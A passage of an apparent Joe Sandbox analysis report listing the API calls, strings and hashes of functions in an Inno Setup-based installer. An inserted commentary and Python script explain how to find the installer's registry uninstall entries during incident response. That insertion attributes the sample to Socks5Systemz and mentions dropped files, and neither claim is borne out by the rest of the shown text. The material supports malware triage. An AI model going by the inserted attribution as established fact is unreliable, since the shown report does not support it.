                                                              • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                              Strings
                                                              • %s\%s_is1, xrefs: 00478F10
                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                              • API String ID: 47109696-1598650737
                                                              • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                              • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                              • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                              • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                              APIs
                                                              • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMessageSendShell
                                                              • String ID: open
                                                              • API String ID: 812272486-2758837156
                                                              • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                              • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                              • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                              • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                              APIs
                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                              • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DirectoryErrorExecuteLastShellSystem
                                                              • String ID: <
                                                              • API String ID: 893404051-4251816714
                                                              • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                              • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                              • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                              • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                              • String ID: )
                                                              • API String ID: 2227675388-1084416617
                                                              • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                              • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                              • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                              • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window
                                                              • String ID: /INITPROCWND=$%x $@
                                                              • API String ID: 2353593579-4169826103
                                                              • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                              • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                              • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                              • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                              APIs
                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: String$AllocByteCharFreeMultiWide
                                                              • String ID: NIL Interface Exception$Unknown Method
                                                              • API String ID: 3952431833-1023667238
                                                              • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                              • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                              • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                              • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                              • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                              • String ID: 0nI
                                                              • API String ID: 3798668922-794067871
                                                              • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                              • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                              • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                              • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Value$EnumQuery
                                                              • String ID: Inno Setup: No Icons
                                                              • API String ID: 1576479698-2016326496
                                                              • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                              • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                              • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                              • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
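The function above that queries the `Inno Setup: No Icons` value, together with the earlier one that opens `Software\Microsoft\Windows\CurrentVersion\Uninstall` and formats `%s\%s_is1`, is Inno Setup's own uninstall-registration code rather than anything specific to the Socks5Systemz payload: Inno Setup records each install as an `<AppId>_is1` subkey of `Uninstall` (under HKLM or HKCU, and under the Wow6432Node view for a 32-bit installer on 64-bit Windows) and writes its `Inno Setup: ...` values there. A responder who wants to know whether this installer registered itself on a host can export that key with `reg export` and look for those markers. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses a `.reg` export of the Uninstall key and returns the `_is1` entries with their Inno Setup values. The embedded export is constructed for the example; the AppId GUID, paths, product names and the value data in it are made up, while the `_is1` suffix and the `Inno Setup: ...` value names are the ones Inno Setup itself uses.

```python
"""Triage helper: list Inno Setup uninstall registrations found in a .reg export.

Added example; this is not code from the Joe Sandbox report or from the sample.
"""
import re
from typing import Dict, List, Optional, Union

RegValue = Union[str, int]

# Constructed sample export (not captured from this analysis). GUID, paths and
# product names are invented; only the `_is1` suffix and the `Inno Setup: ...`
# value names follow Inno Setup's real conventions.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7A1B2C3D-0000-4000-8000-000000000001}_is1]
"Inno Setup: Setup Version"="6.2.2"
"Inno Setup: App Path"="C:\\ProgramData\\ExampleTool"
"Inno Setup: User"="user"
"Inno Setup: No Icons"="1"
"DisplayName"="ExampleTool"
"UninstallString"="\"C:\\ProgramData\\ExampleTool\\unins000.exe\""
"NoModify"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B2C3D4E5-1111-4111-8111-111111111111}]
"DisplayName"="Some MSI Product"
"UninstallString"="MsiExec.exe /X{B2C3D4E5-1111-4111-8111-111111111111}"
'''

_KEY_RE = re.compile(r'^\[(?P<path>[^\]]+)\]$')
_VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')


def _unescape(s: str) -> str:
    # .reg files escape a backslash and a double quote with a leading backslash.
    return re.sub(r'\\(.)', r'\1', s)


def _decode_data(data: str) -> RegValue:
    """Decode the right-hand side of a .reg value line.

    Quoted strings are unescaped, `dword:` values become ints, anything else
    (hex(...) blobs, including multi-line ones) is returned as the raw text.
    """
    if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
        return _unescape(data[1:-1])
    if data.lower().startswith('dword:'):
        return int(data[6:], 16)
    return data


def parse_reg_export(text: str) -> Dict[str, Dict[str, RegValue]]:
    """Parse .reg text into {key path: {value name: value}}.

    Continuation lines of multi-line hex values and `@=` default values are
    skipped; they are not needed for this check.
    """
    keys: Dict[str, Dict[str, RegValue]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(('Windows Registry Editor', 'REGEDIT4')):
            continue
        key = _KEY_RE.match(line)
        if key:
            current = key.group('path')
            keys[current] = {}
            continue
        value = _VALUE_RE.match(line)
        if value and current is not None:
            keys[current][_unescape(value.group('name'))] = _decode_data(value.group('data'))
    return keys


def find_inno_setup_entries(text: str) -> List[Dict[str, object]]:
    """Return one record per `<AppId>_is1` uninstall subkey with its Inno Setup values."""
    found: List[Dict[str, object]] = []
    for path, values in parse_reg_export(text).items():
        subkey = path.rsplit('\\', 1)[-1]
        if not subkey.lower().endswith('_is1'):
            continue
        found.append({
            'key': path,
            'app_id': subkey[:-4],
            'display_name': values.get('DisplayName'),
            'app_path': values.get('Inno Setup: App Path'),
            'uninstall_string': values.get('UninstallString'),
            'inno_values': {k: v for k, v in values.items() if k.startswith('Inno Setup: ')},
        })
    return found


def load_reg_file(path: str) -> str:
    """Read a .reg file: regedit exports UTF-16LE with a BOM, older files are ANSI."""
    with open(path, 'rb') as fh:
        data = fh.read()
    if data.startswith(b'\xff\xfe'):
        return data.decode('utf-16')
    return data.decode('utf-8', errors='replace')


if __name__ == '__main__':
    # On a real host, replace SAMPLE_REG_EXPORT with load_reg_file('uninstall.reg').
    for entry in find_inno_setup_entries(SAMPLE_REG_EXPORT):
        print(entry['app_id'], entry['display_name'], entry['app_path'])
        for name, val in entry['inno_values'].items():
            print('   ', name, '=', val)
```

Export the key on the host with `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" uninstall.reg` (and again for `HKCU` and the `Wow6432Node` path), then point `load_reg_file` at the result. An entry's `Inno Setup: App Path` is the directory the installer unpacked into, which is where the dropped files this report lists under `C:\ProgramData` would be expected to sit; matching it against the report's dropped-file paths is the quick confirmation that this installer, and not some unrelated Inno Setup package, produced the key.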
                                                              APIs
                                                              • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AttributesErrorFileLast
                                                              • String ID: T$H
                                                              • API String ID: 1799206407-488339322
                                                              • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                              • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                              • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                              • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                              • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: T$H
                                                              • API String ID: 2018770650-488339322
                                                              • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                              • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                              • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                              • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                              APIs
                                                              • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                              • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DirectoryErrorLastRemove
                                                              • String ID: T$H
                                                              • API String ID: 377330604-488339322
                                                              • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                              • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                              • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                              • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                              APIs
                                                                • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73AF0000,00481A2F), ref: 0047D0E2
                                                                • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                              Strings
                                                              • Detected restart. Removing temporary directory., xrefs: 00498013
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                              • String ID: Detected restart. Removing temporary directory.
                                                              • API String ID: 1717587489-3199836293
                                                              • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                              • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                              • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                              • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                              • GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CommandHandleLineModule
                                                              • String ID: `6h
                                                              • API String ID: 2123368496-2112055853
                                                              • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                              • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                              • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                              • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastSleep
                                                              • String ID:
                                                              • API String ID: 1458359878-0
                                                              • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                              • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                              • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                              • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                              Execution Graph

                                                              Execution Coverage: 4.1%
                                                              Dynamic/Decrypted Code Coverage: 83.5%
                                                              Signature Coverage: 3.5%
                                                              Total number of Nodes: 2000
                                                              Total number of Limit Nodes: 37
